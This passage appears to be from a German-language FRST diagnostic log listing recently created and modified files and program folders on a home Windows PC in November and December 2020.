2020-11-10 09:40 - 2020-11-10 09:40 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000580096 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2020-11-10 09:40 - 2020-11-10 09:40 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2020-11-10 09:40 - 2020-11-10 09:40 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000455168 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2020-11-10 09:40 - 2020-11-10 09:40 - 000266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\bthprops.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\system32\mpg2splt.ax
2020-11-10 09:40 - 2020-11-10 09:40 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000221184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bthprops.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000204800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mpg2splt.ax
2020-11-10 09:40 - 2020-11-10 09:40 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000137016 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000112128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\activeds.tlb
2020-11-10 09:40 - 2020-11-10 09:40 - 000112128 _____ (Microsoft Corporation) C:\WINDOWS\system32\activeds.tlb
2020-11-10 09:40 - 2020-11-10 09:40 - 000111616 _____ C:\WINDOWS\system32\RDVGHelper.exe
2020-11-10 09:40 - 2020-11-10 09:40 - 000102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncpa.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000101688 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000100864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncpa.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2020-11-10 09:40 - 2020-11-10 09:40 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2020-11-10 09:40 - 2020-11-10 09:40 - 000060928 _____ C:\WINDOWS\system32\runexehelper.exe
2020-11-10 09:40 - 2020-11-10 09:40 - 000056672 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtmmvrortc.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000055376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtmmvrortc.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000048640 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000047472 _____ C:\WINDOWS\SysWOW64\umpdc.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000045880 _____ C:\WINDOWS\system32\HvSocket.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000039936 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msacm32.drv
2020-11-10 09:39 - 2020-11-10 09:39 - 004227116 _____ C:\WINDOWS\system32\DefaultHrtfs.bin
2020-11-10 09:39 - 2020-11-10 09:39 - 002260480 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 002260480 _____ (The ICU Project) C:\WINDOWS\system32\icu.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000707544 _____ C:\WINDOWS\system32\TextShaping.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000645120 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2020-11-10 09:39 - 2020-11-10 09:39 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000306176 _____ C:\WINDOWS\system32\HeatCore.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000287232 _____ C:\WINDOWS\system32\CoreMas.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000165376 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2020-11-10 09:39 - 2020-11-10 09:39 - 000089088 _____ C:\WINDOWS\system32\windows.applicationmodel.conversationalagent.proxystub.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000073216 _____ C:\WINDOWS\system32\windows.applicationmodel.conversationalagent.internal.proxystub.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000064552 _____ C:\WINDOWS\system32\umpdc.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\msacm32.drv
2020-11-10 09:39 - 2020-11-10 09:39 - 000029696 _____ (The ICU Project) C:\WINDOWS\system32\icuuc.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000025088 _____ (The ICU Project) C:\WINDOWS\system32\icuin.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000013312 _____ C:\WINDOWS\system32\agentactivationruntimestarter.exe
2020-11-10 09:35 - 2020-11-10 09:35 - 000076060 _____ C:\WINDOWS\SysWOW64\xpsrchvw.xml
2020-11-10 09:35 - 2020-11-10 09:35 - 000076060 _____ C:\WINDOWS\system32\xpsrchvw.xml
2020-11-10 09:33 - 2020-11-10 09:33 - 000000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2020-11-10 09:33 - 2020-11-10 09:33 - 000000000 ____D C:\Program Files\Reference Assemblies
2020-11-10 09:33 - 2020-11-10 09:33 - 000000000 ____D C:\Program Files\MSBuild
2020-11-10 09:33 - 2020-11-10 09:33 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies
2020-11-10 09:33 - 2020-11-10 09:33 - 000000000 ____D C:\Program Files (x86)\MSBuild
2020-11-10 09:28 - 2020-11-10 09:28 - 000008192 _____ C:\WINDOWS\system32\config\userdiff
2020-11-10 09:10 - 2020-11-28 19:58 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-11-10 09:08 - 2020-11-10 11:00 - 000000000 ___DC C:\WINDOWS\Panther
2020-11-10 09:05 - 2020-11-10 09:05 - 000000000 ___HD C:\$WinREAgent
2020-11-09 10:15 - 2020-11-09 10:15 - 000000685 _____ C:\Users\Tom\Desktop\opensearch.xml

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2020-12-03 22:00 - 2017-12-02 16:35 - 000000000 ____D C:\Users\Tom\AppData\LocalLow\Mozilla
2020-12-03 21:59 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-12-03 17:00 - 2017-12-01 17:39 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-12-03 16:49 - 2019-12-07 15:51 - 000743650 _____ C:\WINDOWS\system32\perfh007.dat
2020-12-03 16:49 - 2019-12-07 15:51 - 000150072 _____ C:\WINDOWS\system32\perfc007.dat
2020-12-03 16:49 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2020-12-03 16:44 - 2017-12-10 20:21 - 000000000 ____D C:\ProgramData\Hauppauge
2020-12-03 16:44 - 2017-12-02 07:42 - 000000000 ____D C:\ProgramData\NVIDIA
2020-12-03 16:43 - 2019-12-07 20:57 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Lavasoft
2020-12-03 16:43 - 2019-12-07 20:57 - 000000000 ____D C:\Users\Tom_Admin\AppData\Local\Lavasoft
2020-12-03 16:43 - 2019-12-07 10:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2020-12-03 16:33 - 2017-12-04 20:37 - 000000000 ____D C:\ProgramData\Origin
2020-12-03 16:32 - 2017-12-04 20:37 - 000000000 ____D C:\Users\Tom\AppData\Local\Origin
2020-12-03 16:31 - 2019-12-07 10:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2020-12-02 23:37 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-12-02 23:23 - 2018-04-14 19:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LEGO Company
2020-12-02 23:23 - 2017-12-02 13:41 - 000000000 ____D C:\Users\Tom\AppData\Local\Packages
2020-12-02 22:44 - 2020-05-13 14:25 - 000000000 ____D C:\Users\Tom\AppData\LocalLow\Temp
2020-12-02 22:08 - 2020-10-22 18:33 - 000002361 _____ C:\Users\Tom_Admin\Desktop\Microsoft Edge.lnk
2020-12-02 22:08 - 2017-12-01 17:06 - 000000000 ____D C:\Users\Tom_Admin\AppData\Local\Packages
2020-12-02 22:07 - 2017-12-01 17:06 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-12-02 22:07 - 2017-12-01 17:06 - 000000000 ___RD C:\Users\Tom_Admin\3D Objects
2020-12-02 21:30 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-12-02 20:53 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2020-12-02 20:07 - 2017-12-04 20:38 - 000000000 ____D C:\Program Files (x86)\Origin
2020-12-01 14:51 - 2020-07-02 17:43 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-12-01 05:06 - 2017-12-04 20:39 - 000000000 ____D C:\Users\Tom\AppData\Roaming\Origin
2020-11-29 23:36 - 2017-12-27 17:28 - 000000000 ____D C:\Users\Tom\.mediathek3
2020-11-29 17:05 - 2017-12-04 20:40 - 000000000 ____D C:\Program Files (x86)\Origin Games
2020-11-29 12:03 - 2018-03-20 16:18 - 000000000 ____D C:\Users\Tom\Desktop\Ebay-Bilder
2020-11-28 20:33 - 2019-05-10 21:11 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Discord
2020-11-28 20:33 - 2017-12-02 13:07 - 000000000 ____D C:\Users\Vincent\AppData\LocalLow\Mozilla
2020-11-28 20:31 - 2020-02-19 14:17 - 000000000 ____D C:\Users\Vincent\AppData\Local\Ubisoft Game Launcher
2020-11-28 20:29 - 2017-12-02 13:05 - 000000000 ___RD C:\Users\Vincent\OneDrive
2020-11-28 20:28 - 2020-02-13 21:08 - 000001434 _____ C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Browser Opera GX.lnk
2020-11-28 20:28 - 2019-05-10 21:11 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2020-11-28 20:28 - 2019-05-10 21:11 - 000000000 ____D C:\Users\Vincent\AppData\Local\Discord
2020-11-28 20:27 - 2017-12-02 13:04 - 000000000 ___RD C:\Users\Vincent\3D Objects
2020-11-28 20:27 - 2017-12-02 13:04 - 000000000 ____D C:\Users\Vincent\AppData\Local\Packages
2020-11-28 19:57 - 2017-12-06 18:20 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Origin
2020-11-28 19:53 - 2018-11-21 19:15 - 000000000 ____D C:\Users\Tom_Admin\Documents\Command and Conquer Generals Zero Hour Data
2020-11-28 19:44 - 2017-12-04 20:38 - 000000000 ____D C:\Users\Tom_Admin\AppData\Local\Origin
2020-11-28 18:49 - 2017-12-04 21:48 - 000000000 ____D C:\Users\Tom\Documents\Command and Conquer Generals Zero Hour Data
2020-11-27 13:35 - 2019-04-05 07:38 - 000000000 ____D C:\Program Files (x86)\StarMoney 12 Basic
2020-11-25 12:56 - 2020-03-23 18:41 - 000028432 _____ C:\Users\Tom\Desktop\Corona-Entwicklung.xlsx
2020-11-25 08:33 - 2020-03-05 20:01 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-11-24 20:40 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Macromed
2020-11-24 20:36 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2020-11-24 11:48 - 2017-12-27 17:34 - 000000000 ____D C:\Users\Tom\AppData\Roaming\vlc
2020-11-24 10:54 - 2017-12-01 17:39 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-11-19 23:49 - 2020-09-30 01:00 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2020-11-16 22:07 - 2020-09-30 01:00 - 000722760 _____ (Microsoft Corporation) C:\WINDOWS\system32\sedplugins.dll
2020-11-16 22:07 - 2020-09-30 01:00 - 000470344 _____ (Microsoft Corporation) C:\WINDOWS\system32\QualityUpdateAssistant.dll
2020-11-16 10:31 - 2019-04-08 06:22 - 000000000 ____D C:\Users\Tom\AppData\Local\Garmin
2020-11-16 10:30 - 2018-03-04 23:10 - 000000000 ____D C:\ProgramData\Garmin
2020-11-16 10:30 - 2018-03-04 23:10 - 000000000 ____D C:\Program Files (x86)\Garmin
2020-11-16 10:30 - 2017-12-02 07:41 - 000000000 ____D C:\ProgramData\Package Cache
2020-11-15 13:40 - 2019-07-18 09:27 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2020-11-11 17:51 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-11-11 07:45 - 2019-12-07 10:18 - 000842296 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2020-11-11 07:45 - 2019-12-07 10:18 - 000175160 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2020-11-11 07:10 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\servicing
2020-11-11 07:10 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-11-11 07:05 - 2017-12-02 01:07 - 000000000 ____D C:\WINDOWS\system32\MRT
2020-11-11 07:03 - 2017-12-02 01:07 - 133736600 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2020-11-11 04:29 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\appcompat
2020-11-10 11:16 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2020-11-10 11:00 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Registration
2020-11-10 11:00 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\USOPrivate
2020-11-10 11:00 - 2018-07-03 15:27 - 000000000 ____D C:\ProgramData\Packages
2020-11-10 11:00 - 2017-12-02 13:41 - 000000000 ___RD C:\Users\Tom\3D Objects
2020-11-10 10:59 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2020-11-10 10:57 - 2018-05-02 06:16 - 000023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2020-11-10 10:54 - 2019-12-28 14:50 - 000000000 ____D C:\temp
2020-11-10 10:54 - 2017-12-02 07:33 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2020-11-10 10:54 - 2017-12-01 17:41 - 000000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2020-11-10 10:54 - 2017-12-01 17:41 - 000000000 ____D C:\WINDOWS\system32\DAX2
2020-11-10 10:53 - 2020-10-17 18:46 - 000000000 ____D C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OpenAudible
2020-11-10 10:53 - 2020-08-31 10:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2020-11-10 10:53 - 2020-05-13 21:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools
2020-11-10 10:53 - 2020-05-13 16:44 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2020-11-10 10:53 - 2020-03-30 12:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MozBackup
2020-11-10 10:53 - 2020-02-25 22:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OBS Studio
2020-11-10 10:53 - 2020-02-21 11:55 - 000000000 ____D C:\WINDOWS\system32\appmgmt
2020-11-10 10:53 - 2020-02-13 21:11 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Medal B.V
2020-11-10 10:53 - 2020-02-10 15:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SpeedCommander 17 (x64)
2020-11-10 10:53 - 2020-01-11 18:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\T16 Wired Gaming Mouse
2020-11-10 10:53 - 2019-12-07 10:14 - 000028672 _____ C:\WINDOWS\system32\config\BCD-Template
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 __RHD C:\Users\Public\Libraries
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioDatabase
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\spool
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\NDF
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Help
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2020-11-10 10:53 - 2019-11-04 12:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RV-Print 2.0
2020-11-10 10:53 - 2019-10-07 11:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ProgTV 2 (x64)
2020-11-10 10:53 - 2019-08-26 16:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ant Renamer
2020-11-10 10:53 - 2019-08-25 17:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced Renamer
2020-11-10 10:53 - 2019-08-21 23:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Anthem™
2020-11-10 10:53 - 2019-07-19 18:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Krita
2020-11-10 10:53 - 2019-06-19 11:04 - 000000000 ____D C:\Program Files\UNP
2020-11-10 10:53 - 2019-06-17 20:35 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Drakonia Black
2020-11-10 10:53 - 2019-04-05 07:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarMoney 12 Basic
2020-11-10 10:53 - 2019-03-23 13:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WAF-Programme
2020-11-10 10:53 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2020-11-10 10:53 - 2018-10-05 17:33 - 000000000 ___RD C:\Program Files\Microsoft Games
2020-11-10 10:53 - 2018-10-05 17:33 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2020-11-10 10:53 - 2018-10-05 09:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mein CEWE FOTOBUCH
2020-11-10 10:53 - 2018-07-03 17:01 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2020-11-10 10:53 - 2018-04-17 15:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Das Telefonbuch Gelbe Seiten Map & Route
2020-11-10 10:53 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\MsDtc
2020-11-10 10:53 - 2018-03-04 18:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Plex Media Server
2020-11-10 10:53 - 2018-01-20 16:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\News File Grabber
2020-11-10 10:53 - 2017-12-27 17:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2020-11-10 10:53 - 2017-12-16 14:28 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pokémon Trading Card Game Online
2020-11-10 10:53 - 2017-12-11 12:29 - 000000000 ____D C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2020-11-10 10:53 - 2017-12-10 20:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hauppauge WinTV
2020-11-10 10:53 - 2017-12-10 12:52 - 000000000 ____D C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Phase 5 HTML-Editor
2020-11-10 10:53 - 2017-12-09 21:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2020-11-10 10:53 - 2017-12-05 20:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Command and Conquer The Ultimate Collection Additional Content
2020-11-10 10:53 - 2017-12-05 20:23 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Westwood Chat
2020-11-10 10:53 - 2017-12-05 19:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Westwood Online
2020-11-10 10:53 - 2017-12-04 22:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Biet-O-Matic
2020-11-10 10:53 - 2017-12-04 20:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2020-11-10 10:53 - 2017-12-03 23:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarMoney 11
2020-11-10 10:53 - 2017-12-03 19:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft
2020-11-10 10:53 - 2017-12-03 13:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2020-11-10 10:53 - 2017-12-02 17:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Synology
2020-11-10 10:53 - 2017-12-02 07:33 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2020-11-10 10:53 - 2017-12-02 01:11 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\QuickPar
2020-11-10 10:53 - 2017-12-02 01:10 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SABnzbd
2020-11-10 10:53 - 2017-12-02 01:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ghostscript
2020-11-10 10:53 - 2017-12-02 00:35 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip
2020-11-10 10:53 - 2017-12-02 00:34 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2020-11-10 10:53 - 2017-12-02 00:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2020-11-10 10:53 - 2017-12-02 00:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\calibre 64bit - E-book Management
2020-11-10 10:53 - 2017-12-02 00:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyPhoneExplorer
2020-11-10 10:53 - 2017-12-01 23:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack
2020-11-10 10:53 - 2017-12-01 23:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IrfanView
2020-11-10 10:53 - 2017-12-01 21:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SpeedCommander 16 (x64)
2020-11-10 10:53 - 2017-09-29 14:46 - 000000000 ___HD C:\WINDOWS\system32\GroupPolicy
2020-11-10 10:52 - 2019-12-07 10:18 - 000000000 ____D C:\WINDOWS\Setup
2020-11-10 09:46 - 2020-02-27 21:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FlashIntegro
2020-11-10 09:46 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Resources
2020-11-10 09:46 - 2019-07-18 18:14 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2020-11-10 09:46 - 2018-10-12 11:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2020-11-10 09:46 - 2018-09-07 15:33 - 000000000 ____D C:\WINDOWS\system32\Drivers\NVIDIA Corporation
2020-11-10 09:46 - 2017-12-01 17:41 - 000000000 ____D C:\Program Files\Realtek
2020-11-10 09:46 - 2017-12-01 17:40 - 000000000 ____D C:\Program Files\Intel
2020-11-10 09:45 - 2020-02-27 20:14 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blackmagic Design
2020-11-10 09:45 - 2017-12-04 21:58 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\migwiz
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2020-11-10 09:42 - 2019-12-07 15:54 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\OEMDefaultAssociations.dll
2020-11-10 09:42 - 2019-12-07 15:54 - 000020908 _____ C:\WINDOWS\system32\OEMDefaultAssociations.xml
2020-11-10 09:42 - 2019-12-07 15:54 - 000000000 ___SD C:\WINDOWS\system32\AppV
2020-11-10 09:42 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2020-11-10 09:42 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\ShellExperiences
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
